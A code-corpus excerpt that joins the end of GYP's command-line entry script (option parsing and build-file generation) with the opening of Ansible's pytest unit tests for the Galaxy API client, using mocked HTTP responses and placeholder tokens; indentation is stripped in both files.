parser.add_option('-f', '--format', dest='formats', action='append',
env_name='GYP_GENERATORS', regenerate=False,
help='output formats to generate')
parser.add_option('-G', dest='generator_flags', action='append', default=[],
metavar='FLAG=VAL', env_name='GYP_GENERATOR_FLAGS',
help='sets generator flag FLAG to VAL')
parser.add_option('--generator-output', dest='generator_output',
action='store', default=None, metavar='DIR', type='path',
env_name='GYP_GENERATOR_OUTPUT',
help='puts generated build files under DIR')
parser.add_option('--ignore-environment', dest='use_environment',
action='store_false', default=True, regenerate=False,
help='do not read options from environment variables')
parser.add_option('-I', '--include', dest='includes', action='append',
metavar='INCLUDE', type='path',
help='files to include in all loaded .gyp files')
# --no-circular-check disables the check for circular relationships between
# .gyp files. These relationships should not exist, but they've only been
# observed to be harmful with the Xcode generator. Chromium's .gyp files
# currently have some circular relationships on non-Mac platforms, so this
# option allows the strict behavior to be used on Macs and the lenient
# behavior to be used elsewhere.
# TODO(mark): Remove this option when http://crbug.com/35878 is fixed.
parser.add_option('--no-circular-check', dest='circular_check',
action='store_false', default=True, regenerate=False,
help="don't check for circular relationships between files")
# --no-duplicate-basename-check disables the check for duplicate basenames
# in a static_library/shared_library project. Visual C++ 2008 generator
# doesn't support this configuration. Libtool on Mac also generates warnings
# when duplicate basenames are passed into Make generator on Mac.
# TODO(yukawa): Remove this option when these legacy generators are
# deprecated.
parser.add_option('--no-duplicate-basename-check',
dest='duplicate_basename_check', action='store_false',
default=True, regenerate=False,
help="don't check for duplicate basenames")
parser.add_option('--no-parallel', action='store_true', default=False,
help='Disable multiprocessing')
parser.add_option('-S', '--suffix', dest='suffix', default='',
help='suffix to add to generated files')
parser.add_option('--toplevel-dir', dest='toplevel_dir', action='store',
default=None, metavar='DIR', type='path',
help='directory to use as the root of the source tree')
parser.add_option('-R', '--root-target', dest='root_targets',
action='append', metavar='TARGET',
help='include only TARGET and its deep dependencies')
options, build_files_arg = parser.parse_args(args)
build_files = build_files_arg
# Set up the configuration directory (defaults to ~/.gyp)
if not options.config_dir:
home = None
home_dot_gyp = None
if options.use_environment:
home_dot_gyp = os.environ.get('GYP_CONFIG_DIR', None)
if home_dot_gyp:
home_dot_gyp = os.path.expanduser(home_dot_gyp)
if not home_dot_gyp:
home_vars = ['HOME']
if sys.platform in ('cygwin', 'win32'):
home_vars.append('USERPROFILE')
for home_var in home_vars:
home = os.getenv(home_var)
if home != None:
home_dot_gyp = os.path.join(home, '.gyp')
if not os.path.exists(home_dot_gyp):
home_dot_gyp = None
else:
break
else:
home_dot_gyp = os.path.expanduser(options.config_dir)
if home_dot_gyp and not os.path.exists(home_dot_gyp):
home_dot_gyp = None
if not options.formats:
# If no format was given on the command line, then check the env variable.
generate_formats = []
if options.use_environment:
generate_formats = os.environ.get('GYP_GENERATORS', [])
if generate_formats:
generate_formats = re.split(r'[\s,]', generate_formats)
if generate_formats:
options.formats = generate_formats
else:
# Nothing in the variable, default based on platform.
if sys.platform == 'darwin':
options.formats = ['xcode']
elif sys.platform in ('win32', 'cygwin'):
options.formats = ['msvs']
else:
options.formats = ['make']
if not options.generator_output and options.use_environment:
g_o = os.environ.get('GYP_GENERATOR_OUTPUT')
if g_o:
options.generator_output = g_o
options.parallel = not options.no_parallel
for mode in options.debug:
gyp.debug[mode] = 1
# Do an extra check to avoid work when we're not debugging.
if DEBUG_GENERAL in gyp.debug:
DebugOutput(DEBUG_GENERAL, 'running with these options:')
for option, value in sorted(options.__dict__.items()):
if option[0] == '_':
continue
if isinstance(value, basestring):
DebugOutput(DEBUG_GENERAL, " %s: '%s'", option, value)
else:
DebugOutput(DEBUG_GENERAL, " %s: %s", option, value)
if not build_files:
build_files = FindBuildFiles()
if not build_files:
raise GypError((usage + '\n\n%s: error: no build_file') %
(my_name, my_name))
# TODO(mark): Chromium-specific hack!
# For Chromium, the gyp "depth" variable should always be a relative path
# to Chromium's top-level "src" directory. If no depth variable was set
# on the command line, try to find a "src" directory by looking at the
# absolute path to each build file's directory. The first "src" component
# found will be treated as though it were the path used for --depth.
if not options.depth:
for build_file in build_files:
build_file_dir = os.path.abspath(os.path.dirname(build_file))
build_file_dir_components = build_file_dir.split(os.path.sep)
components_len = len(build_file_dir_components)
for index in xrange(components_len - 1, -1, -1):
if build_file_dir_components[index] == 'src':
options.depth = os.path.sep.join(build_file_dir_components)
break
del build_file_dir_components[index]
# If the inner loop found something, break without advancing to another
# build file.
if options.depth:
break
if not options.depth:
raise GypError('Could not automatically locate src directory. This is'
'a temporary Chromium feature that will be removed. Use'
'--depth as a workaround.')
# If toplevel-dir is not set, we assume that depth is the root of our source
# tree.
if not options.toplevel_dir:
options.toplevel_dir = options.depth
# -D on the command line sets variable defaults - D isn't just for define,
# it's for default. Perhaps there should be a way to force (-F?) a
# variable's value so that it can't be overridden by anything else.
cmdline_default_variables = {}
defines = []
if options.use_environment:
defines += ShlexEnv('GYP_DEFINES')
if options.defines:
defines += options.defines
cmdline_default_variables = NameValueListToDict(defines)
if DEBUG_GENERAL in gyp.debug:
DebugOutput(DEBUG_GENERAL,
"cmdline_default_variables: %s", cmdline_default_variables)
# Set up includes.
includes = []
# If ~/.gyp/include.gypi exists, it'll be forcibly included into every
# .gyp file that's loaded, before anything else is included.
if home_dot_gyp != None:
default_include = os.path.join(home_dot_gyp, 'include.gypi')
if os.path.exists(default_include):
print 'Using overrides found in ' + default_include
includes.append(default_include)
# Command-line --include files come after the default include.
if options.includes:
includes.extend(options.includes)
# Generator flags should be prefixed with the target generator since they
# are global across all generator runs.
gen_flags = []
if options.use_environment:
gen_flags += ShlexEnv('GYP_GENERATOR_FLAGS')
if options.generator_flags:
gen_flags += options.generator_flags
generator_flags = NameValueListToDict(gen_flags)
if DEBUG_GENERAL in gyp.debug.keys():
DebugOutput(DEBUG_GENERAL, "generator_flags: %s", generator_flags)
# Generate all requested formats (use a set in case we got one format request
# twice)
for format in set(options.formats):
params = {'options': options,
'build_files': build_files,
'generator_flags': generator_flags,
'cwd': os.getcwd(),
'build_files_arg': build_files_arg,
'gyp_binary': sys.argv[0],
'home_dot_gyp': home_dot_gyp,
'parallel': options.parallel,
'root_targets': options.root_targets,
'target_arch': cmdline_default_variables.get('target_arch', '')}
# Start with the default variables from the command line.
[generator, flat_list, targets, data] = Load(
build_files, format, cmdline_default_variables, includes, options.depth,
params, options.check, options.circular_check,
options.duplicate_basename_check)
# TODO(mark): Pass |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
# NOTE: flat_list is the flattened dependency graph specifying the order
# that targets may be built. Build systems that operate serially or that
# need to have dependencies defined before dependents reference them should
# generate targets in the order specified in flat_list.
generator.GenerateOutput(flat_list, targets, data, params)
if options.configs:
valid_configs = targets[flat_list[0]]['configurations'].keys()
for conf in options.configs:
if conf not in valid_configs:
raise GypError('Invalid config specified via --build: %s' % conf)
generator.PerformBuild(data, options.configs, params)
# Done
return 0
def main(args):
try:
return gyp_main(args)
except GypError, e:
sys.stderr.write("gyp: %s\n" % e)
return 1
# NOTE: setuptools generated console_scripts calls function with no arguments
def script_main():
return main(sys.argv[1:])
if __name__ == '__main__':
sys.exit(script_main())
| mit |
jtyr/ansible | test/units/galaxy/test_api.py | 11 | 37466 | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
import os
import re
import pytest
import tarfile
import tempfile
import time
from io import BytesIO, StringIO
from units.compat.mock import MagicMock
from ansible import context
from ansible.errors import AnsibleError
from ansible.galaxy import api as galaxy_api
from ansible.galaxy.api import CollectionVersionMetadata, GalaxyAPI, GalaxyError
from ansible.galaxy.token import BasicAuthToken, GalaxyToken, KeycloakToken
from ansible.module_utils._text import to_native, to_text
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.utils import context_objects as co
from ansible.utils.display import Display
@pytest.fixture(autouse='function')
def reset_cli_args():
co.GlobalCLIArgs._Singleton__instance = None
# Required to initialise the GalaxyAPI object
context.CLIARGS._store = {'ignore_certs': False}
yield
co.GlobalCLIArgs._Singleton__instance = None
@pytest.fixture()
def collection_artifact(tmp_path_factory):
''' Creates a collection artifact tarball that is ready to be published '''
output_dir = to_text(tmp_path_factory.mktemp('test-ÅÑŚÌβŁÈ Output'))
tar_path = os.path.join(output_dir, 'namespace-collection-v1.0.0.tar.gz')
with tarfile.open(tar_path, 'w:gz') as tfile:
b_io = BytesIO(b"\x00\x01\x02\x03")
tar_info = tarfile.TarInfo('test')
tar_info.size = 4
tar_info.mode = 0o0644
tfile.addfile(tarinfo=tar_info, fileobj=b_io)
yield tar_path
def get_test_galaxy_api(url, version, token_ins=None, token_value=None):
token_value = token_value or "my token"
token_ins = token_ins or GalaxyToken(token_value)
api = GalaxyAPI(None, "test", url)
# Warning, this doesn't test g_connect() because _availabe_api_versions is set here. That means
# that urls for v2 servers have to append '/api/' themselves in the input data.
api._available_api_versions = {version: '%s' % version}
api.token = token_ins
return api
def test_api_no_auth():
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
actual = {}
api._add_auth_token(actual, "")
assert actual == {}
def test_api_no_auth_but_required():
expected = "No access token or username set. A token can be set with --api-key, with 'ansible-galaxy login', " \
"or set in ansible.cfg."
with pytest.raises(AnsibleError, match=expected):
GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")._add_auth_token({}, "", required=True)
def test_api_token_auth():
token = GalaxyToken(token=u"my_token")
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
api._add_auth_token(actual, "", required=True)
assert actual == {'Authorization': 'Token my_token'}
def test_api_token_auth_with_token_type(monkeypatch):
token = KeycloakToken(auth_url='https://api.test/')
mock_token_get = MagicMock()
mock_token_get.return_value = 'my_token'
monkeypatch.setattr(token, 'get', mock_token_get)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
api._add_auth_token(actual, "", token_type="Bearer", required=True)
assert actual == {'Authorization': 'Bearer my_token'}
def test_api_token_auth_with_v3_url(monkeypatch):
token = KeycloakToken(auth_url='https://api.test/')
mock_token_get = MagicMock()
mock_token_get.return_value = 'my_token'
monkeypatch.setattr(token, 'get', mock_token_get)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
api._add_auth_token(actual, "https://galaxy.ansible.com/api/v3/resource/name", required=True)
assert actual == {'Authorization': 'Bearer my_token'}
def test_api_token_auth_with_v2_url():
token = GalaxyToken(token=u"my_token")
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
# Add v3 to random part of URL but response should only see the v2 as the full URI path segment.
api._add_auth_token(actual, "https://galaxy.ansible.com/api/v2/resourcev3/name", required=True)
assert actual == {'Authorization': 'Token my_token'}
def test_api_basic_auth_password():
token = BasicAuthToken(username=u"user", password=u"pass")
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
api._add_auth_token(actual, "", required=True)
assert actual == {'Authorization': 'Basic dXNlcjpwYXNz'}
def test_api_basic_auth_no_password():
token = BasicAuthToken(username=u"user")
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
actual = {}
api._add_auth_token(actual, "", required=True)
assert actual == {'Authorization': 'Basic dXNlcjo='}
def test_api_dont_override_auth_header():
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
actual = {'Authorization': 'Custom token'}
api._add_auth_token(actual, "", required=True)
assert actual == {'Authorization': 'Custom token'}
def test_initialise_galaxy(monkeypatch):
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(u'{"available_versions":{"v1":"v1/"}}'),
StringIO(u'{"token":"my token"}'),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
actual = api.authenticate("github_token")
assert len(api.available_api_versions) == 2
assert api.available_api_versions['v1'] == u'v1/'
assert api.available_api_versions['v2'] == u'v2/'
assert actual == {u'token': u'my token'}
assert mock_open.call_count == 2
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
assert mock_open.mock_calls[1][1][0] == 'https://galaxy.ansible.com/api/v1/tokens/'
assert 'ansible-galaxy' in mock_open.mock_calls[1][2]['http_agent']
assert mock_open.mock_calls[1][2]['data'] == 'github_token=github_token'
def test_initialise_galaxy_with_auth(monkeypatch):
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(u'{"available_versions":{"v1":"v1/"}}'),
StringIO(u'{"token":"my token"}'),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=GalaxyToken(token='my_token'))
actual = api.authenticate("github_token")
assert len(api.available_api_versions) == 2
assert api.available_api_versions['v1'] == u'v1/'
assert api.available_api_versions['v2'] == u'v2/'
assert actual == {u'token': u'my token'}
assert mock_open.call_count == 2
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
assert mock_open.mock_calls[1][1][0] == 'https://galaxy.ansible.com/api/v1/tokens/'
assert 'ansible-galaxy' in mock_open.mock_calls[1][2]['http_agent']
assert mock_open.mock_calls[1][2]['data'] == 'github_token=github_token'
def test_initialise_automation_hub(monkeypatch):
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(u'{"available_versions":{"v2": "v2/", "v3":"v3/"}}'),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
token = KeycloakToken(auth_url='https://api.test/')
mock_token_get = MagicMock()
mock_token_get.return_value = 'my_token'
monkeypatch.setattr(token, 'get', mock_token_get)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=token)
assert len(api.available_api_versions) == 2
assert api.available_api_versions['v2'] == u'v2/'
assert api.available_api_versions['v3'] == u'v3/'
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
assert mock_open.mock_calls[0][2]['headers'] == {'Authorization': 'Bearer my_token'}
def test_initialise_unknown(monkeypatch):
mock_open = MagicMock()
mock_open.side_effect = [
urllib_error.HTTPError('https://galaxy.ansible.com/api/', 500, 'msg', {}, StringIO(u'{"msg":"raw error"}')),
urllib_error.HTTPError('https://galaxy.ansible.com/api/api/', 500, 'msg', {}, StringIO(u'{"msg":"raw error"}')),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/", token=GalaxyToken(token='my_token'))
expected = "Error when finding available api versions from test (%s) (HTTP Code: 500, Message: msg)" \
% api.api_server
with pytest.raises(AnsibleError, match=re.escape(expected)):
api.authenticate("github_token")
def test_get_available_api_versions(monkeypatch):
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(u'{"available_versions":{"v1":"v1/","v2":"v2/"}}'),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
api = GalaxyAPI(None, "test", "https://galaxy.ansible.com/api/")
actual = api.available_api_versions
assert len(actual) == 2
assert actual['v1'] == u'v1/'
assert actual['v2'] == u'v2/'
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/'
assert 'ansible-galaxy' in mock_open.mock_calls[0][2]['http_agent']
def test_publish_collection_missing_file():
fake_path = u'/fake/ÅÑŚÌβŁÈ/path'
expected = to_native("The collection path specified '%s' does not exist." % fake_path)
api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v2")
with pytest.raises(AnsibleError, match=expected):
api.publish_collection(fake_path)
def test_publish_collection_not_a_tarball():
expected = "The collection path specified '{0}' is not a tarball, use 'ansible-galaxy collection build' to " \
"create a proper release artifact."
api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v2")
with tempfile.NamedTemporaryFile(prefix=u'ÅÑŚÌβŁÈ') as temp_file:
temp_file.write(b"\x00")
temp_file.flush()
with pytest.raises(AnsibleError, match=expected.format(to_native(temp_file.name))):
api.publish_collection(temp_file.name)
def test_publish_collection_unsupported_version():
expected = "Galaxy action publish_collection requires API versions 'v2, v3' but only 'v1' are available on test " \
"https://galaxy.ansible.com/api/"
api = get_test_galaxy_api("https://galaxy.ansible.com/api/", "v1")
with pytest.raises(AnsibleError, match=expected):
api.publish_collection("path")
@pytest.mark.parametrize('api_version, collection_url', [
('v2', 'collections'),
('v3', 'artifacts/collections'),
])
def test_publish_collection(api_version, collection_url, collection_artifact, monkeypatch):
api = get_test_galaxy_api("https://galaxy.ansible.com/api/", api_version)
mock_call = MagicMock()
mock_call.return_value = {'task': 'http://task.url/'}
monkeypatch.setattr(api, '_call_galaxy', mock_call)
actual = api.publish_collection(collection_artifact)
assert actual == 'http://task.url/'
assert mock_call.call_count == 1
assert mock_call.mock_calls[0][1][0] == 'https://galaxy.ansible.com/api/%s/%s/' % (api_version, collection_url)
assert mock_call.mock_calls[0][2]['headers']['Content-length'] == len(mock_call.mock_calls[0][2]['args'])
assert mock_call.mock_calls[0][2]['headers']['Content-type'].startswith(
'multipart/form-data; boundary=')
assert mock_call.mock_calls[0][2]['args'].startswith(b'--')
assert mock_call.mock_calls[0][2]['method'] == 'POST'
assert mock_call.mock_calls[0][2]['auth_required'] is True
@pytest.mark.parametrize('api_version, collection_url, response, expected', [
('v2', 'collections', {},
'Error when publishing collection to test (%s) (HTTP Code: 500, Message: msg Code: Unknown)'),
('v2', 'collections', {
'message': u'Galaxy error messäge',
'code': 'GWE002',
}, u'Error when publishing collection to test (%s) (HTTP Code: 500, Message: Galaxy error messäge Code: GWE002)'),
('v3', 'artifact/collections', {},
'Error when publishing collection to test (%s) (HTTP Code: 500, Message: msg Code: Unknown)'),
('v3', 'artifact/collections', {
'errors': [
{
'code': 'conflict.collection_exists',
'detail': 'Collection "mynamespace-mycollection-4.1.1" already exists.',
'title': 'Conflict.',
'status': '400',
},
{
'code': 'quantum_improbability',
'title': u'Rändom(?) quantum improbability.',
'source': {'parameter': 'the_arrow_of_time'},
'meta': {'remediation': 'Try again before'},
},
],
}, u'Error when publishing collection to test (%s) (HTTP Code: 500, Message: Collection '
u'"mynamespace-mycollection-4.1.1" already exists. Code: conflict.collection_exists), (HTTP Code: 500, '
u'Message: Rändom(?) quantum improbability. Code: quantum_improbability)')
])
def test_publish_failure(api_version, collection_url, response, expected, collection_artifact, monkeypatch):
api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version)
expected_url = '%s/api/%s/%s' % (api.api_server, api_version, collection_url)
mock_open = MagicMock()
mock_open.side_effect = urllib_error.HTTPError(expected_url, 500, 'msg', {},
StringIO(to_text(json.dumps(response))))
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
with pytest.raises(GalaxyError, match=re.escape(to_native(expected % api.api_server))):
api.publish_collection(collection_artifact)
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
('https://galaxy.server.com/api', 'v2', 'Token', GalaxyToken('my token'),
'1234',
'https://galaxy.server.com/api/v2/collection-imports/1234/'),
('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
'1234',
'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.return_value = StringIO(u'{"state":"success","finished_at":"time"}')
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
mock_display = MagicMock()
monkeypatch.setattr(Display, 'display', mock_display)
api.wait_import_task(import_uri)
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == full_import_uri
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_display.call_count == 1
assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my token'),
'1234',
'https://galaxy.server.com/api/v2/collection-imports/1234/'),
('https://galaxy.server.com/api/automation-hub', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
'1234',
'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_multiple_requests(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(u'{"state":"test"}'),
StringIO(u'{"state":"success","finished_at":"time"}'),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
mock_display = MagicMock()
monkeypatch.setattr(Display, 'display', mock_display)
mock_vvv = MagicMock()
monkeypatch.setattr(Display, 'vvv', mock_vvv)
monkeypatch.setattr(time, 'sleep', MagicMock())
api.wait_import_task(import_uri)
assert mock_open.call_count == 2
assert mock_open.mock_calls[0][1][0] == full_import_uri
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_open.mock_calls[1][1][0] == full_import_uri
assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_display.call_count == 1
assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
assert mock_vvv.call_count == 1
assert mock_vvv.mock_calls[0][1][0] == \
'Galaxy import process has a status of test, wait 2 seconds before trying again'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri,', [
('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my token'),
'1234',
'https://galaxy.server.com/api/v2/collection-imports/1234/'),
('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
'1234',
'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_with_failure(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(to_text(json.dumps({
'finished_at': 'some_time',
'state': 'failed',
'error': {
'code': 'GW001',
'description': u'Becäuse I said so!',
},
'messages': [
{
'level': 'error',
'message': u'Somé error',
},
{
'level': 'warning',
'message': u'Some wärning',
},
{
'level': 'info',
'message': u'Somé info',
},
],
}))),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
mock_display = MagicMock()
monkeypatch.setattr(Display, 'display', mock_display)
mock_vvv = MagicMock()
monkeypatch.setattr(Display, 'vvv', mock_vvv)
mock_warn = MagicMock()
monkeypatch.setattr(Display, 'warning', mock_warn)
mock_err = MagicMock()
monkeypatch.setattr(Display, 'error', mock_err)
expected = to_native(u'Galaxy import process failed: Becäuse I said so! (Code: GW001)')
with pytest.raises(AnsibleError, match=re.escape(expected)):
api.wait_import_task(import_uri)
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == full_import_uri
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_display.call_count == 1
assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
assert mock_vvv.call_count == 1
assert mock_vvv.mock_calls[0][1][0] == u'Galaxy import message: info - Somé info'
assert mock_warn.call_count == 1
assert mock_warn.mock_calls[0][1][0] == u'Galaxy import warning message: Some wärning'
assert mock_err.call_count == 1
assert mock_err.mock_calls[0][1][0] == u'Galaxy import error message: Somé error'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
('https://galaxy.server.com/api/', 'v2', 'Token', GalaxyToken('my_token'),
'1234',
'https://galaxy.server.com/api/v2/collection-imports/1234/'),
('https://galaxy.server.com/api/automation-hub/', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
'1234',
'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_with_failure_no_error(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(to_text(json.dumps({
'finished_at': 'some_time',
'state': 'failed',
'error': {},
'messages': [
{
'level': 'error',
'message': u'Somé error',
},
{
'level': 'warning',
'message': u'Some wärning',
},
{
'level': 'info',
'message': u'Somé info',
},
],
}))),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
mock_display = MagicMock()
monkeypatch.setattr(Display, 'display', mock_display)
mock_vvv = MagicMock()
monkeypatch.setattr(Display, 'vvv', mock_vvv)
mock_warn = MagicMock()
monkeypatch.setattr(Display, 'warning', mock_warn)
mock_err = MagicMock()
monkeypatch.setattr(Display, 'error', mock_err)
expected = 'Galaxy import process failed: Unknown error, see %s for more details \\(Code: UNKNOWN\\)' % full_import_uri
with pytest.raises(AnsibleError, match=expected):
api.wait_import_task(import_uri)
assert mock_open.call_count == 1
assert mock_open.mock_calls[0][1][0] == full_import_uri
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_display.call_count == 1
assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
assert mock_vvv.call_count == 1
assert mock_vvv.mock_calls[0][1][0] == u'Galaxy import message: info - Somé info'
assert mock_warn.call_count == 1
assert mock_warn.mock_calls[0][1][0] == u'Galaxy import warning message: Some wärning'
assert mock_err.call_count == 1
assert mock_err.mock_calls[0][1][0] == u'Galaxy import error message: Somé error'
@pytest.mark.parametrize('server_url, api_version, token_type, token_ins, import_uri, full_import_uri', [
('https://galaxy.server.com/api', 'v2', 'Token', GalaxyToken('my token'),
'1234',
'https://galaxy.server.com/api/v2/collection-imports/1234/'),
('https://galaxy.server.com/api/automation-hub', 'v3', 'Bearer', KeycloakToken(auth_url='https://api.test/'),
'1234',
'https://galaxy.server.com/api/automation-hub/v3/imports/collections/1234/'),
])
def test_wait_import_task_timeout(server_url, api_version, token_type, token_ins, import_uri, full_import_uri, monkeypatch):
api = get_test_galaxy_api(server_url, api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
def return_response(*args, **kwargs):
return StringIO(u'{"state":"waiting"}')
mock_open = MagicMock()
mock_open.side_effect = return_response
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
mock_display = MagicMock()
monkeypatch.setattr(Display, 'display', mock_display)
mock_vvv = MagicMock()
monkeypatch.setattr(Display, 'vvv', mock_vvv)
monkeypatch.setattr(time, 'sleep', MagicMock())
expected = "Timeout while waiting for the Galaxy import process to finish, check progress at '%s'" % full_import_uri
with pytest.raises(AnsibleError, match=expected):
api.wait_import_task(import_uri, 1)
assert mock_open.call_count > 1
assert mock_open.mock_calls[0][1][0] == full_import_uri
assert mock_open.mock_calls[0][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_open.mock_calls[1][1][0] == full_import_uri
assert mock_open.mock_calls[1][2]['headers']['Authorization'] == '%s my token' % token_type
assert mock_display.call_count == 1
assert mock_display.mock_calls[0][1][0] == 'Waiting until Galaxy import task %s has completed' % full_import_uri
# expected_wait_msg = 'Galaxy import process has a status of waiting, wait {0} seconds before trying again'
assert mock_vvv.call_count > 9 # 1st is opening Galaxy token file.
# FIXME:
# assert mock_vvv.mock_calls[1][1][0] == expected_wait_msg.format(2)
# assert mock_vvv.mock_calls[2][1][0] == expected_wait_msg.format(3)
# assert mock_vvv.mock_calls[3][1][0] == expected_wait_msg.format(4)
# assert mock_vvv.mock_calls[4][1][0] == expected_wait_msg.format(6)
# assert mock_vvv.mock_calls[5][1][0] == expected_wait_msg.format(10)
# assert mock_vvv.mock_calls[6][1][0] == expected_wait_msg.format(15)
# assert mock_vvv.mock_calls[7][1][0] == expected_wait_msg.format(22)
# assert mock_vvv.mock_calls[8][1][0] == expected_wait_msg.format(30)
@pytest.mark.parametrize('api_version, token_type, version, token_ins', [
('v2', None, 'v2.1.13', None),
('v3', 'Bearer', 'v1.0.0', KeycloakToken(auth_url='https://api.test/api/automation-hub/')),
])
def test_get_collection_version_metadata_no_version(api_version, token_type, version, token_ins, monkeypatch):
api = get_test_galaxy_api('https://galaxy.server.com/api/', api_version, token_ins=token_ins)
if token_ins:
mock_token_get = MagicMock()
mock_token_get.return_value = 'my token'
monkeypatch.setattr(token_ins, 'get', mock_token_get)
mock_open = MagicMock()
mock_open.side_effect = [
StringIO(to_text(json.dumps({
'download_url': 'https://downloadme.com',
'artifact': {
'sha256': 'ac47b6fac117d7c171812750dacda655b04533cf56b31080b82d1c0db3c9d80f',
},
'namespace': {
'name': 'namespace',
},
'collection': {
'name': 'collection',
},
'version': version,
'metadata': {
'dependencies': {},
}
}))),
]
monkeypatch.setattr(galaxy_api, 'open_url', mock_open)
